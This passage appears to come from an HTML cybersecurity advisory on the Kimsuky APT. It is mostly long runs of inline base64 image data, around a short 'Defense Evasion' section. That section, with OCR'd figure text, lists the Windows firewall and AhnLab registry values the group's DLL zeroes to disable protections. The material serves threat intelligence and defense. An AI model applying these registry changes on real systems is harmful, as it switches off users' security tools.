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” style=”width: 312px; height: 399px;” /></font></font></p>

<p class=”text-align-center” style=”margin-top: 8px; margin-bottom: 13px;”><em>Figure 1: Privileges set for the injection</em> [<a href=”https://yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/”>37</a>]</p>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Defense Evasion</h4>

<p>Kimsuky uses well-known and widely available methods for <em>Defense Evasion</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0005/”>TA0005</a>] within a network. These methods include disabling security tools, deleting files, and using Metasploit.[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>38</a>],[<a href=”https://attack.mitre.org/groups/G0094/”>39</a>]</p>

<ul>
<li>Kimsuky’s malicious DLL runs at startup to zero (i.e., turn off) the Windows firewall Registry keys (see figure 2). This disables the Windows system firewall and turns off the Windows Security Center service, which prevents the service from alerting the user about the disabled firewall (see figure 2) (<em>Impair Defenses: Disable or Modify System Firewall </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1562/004/”>T1562.004</a>]).[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>40</a>]</li>
</ul>

<p align=”center” style=”text-align: center; margin-bottom: 8px;”><font color=”#000000″><font face=”Times New Roman”><img alt=”Machine generated alternative text:
1
2
3
4
5
6
7
8
9

SYSTEMCurrentControlSetServicesSharedAccessParameters
Fi rewal i cyStandardProfi le
SYSTEMCurrentControlSetServicesSharedAccessParameters
Fi rewal icyPublicProfile
HKLMSOFTWAREAhnLabV31S2ØØ71nternetSec
FWRunMode ø
HKLMSOFTWAREAhn1abV31S8Øis
fwmode ø ” data-entity-type=”” data-entity-uuid=”” src=”https://us-cert.cisa.govdata:image/png;base64,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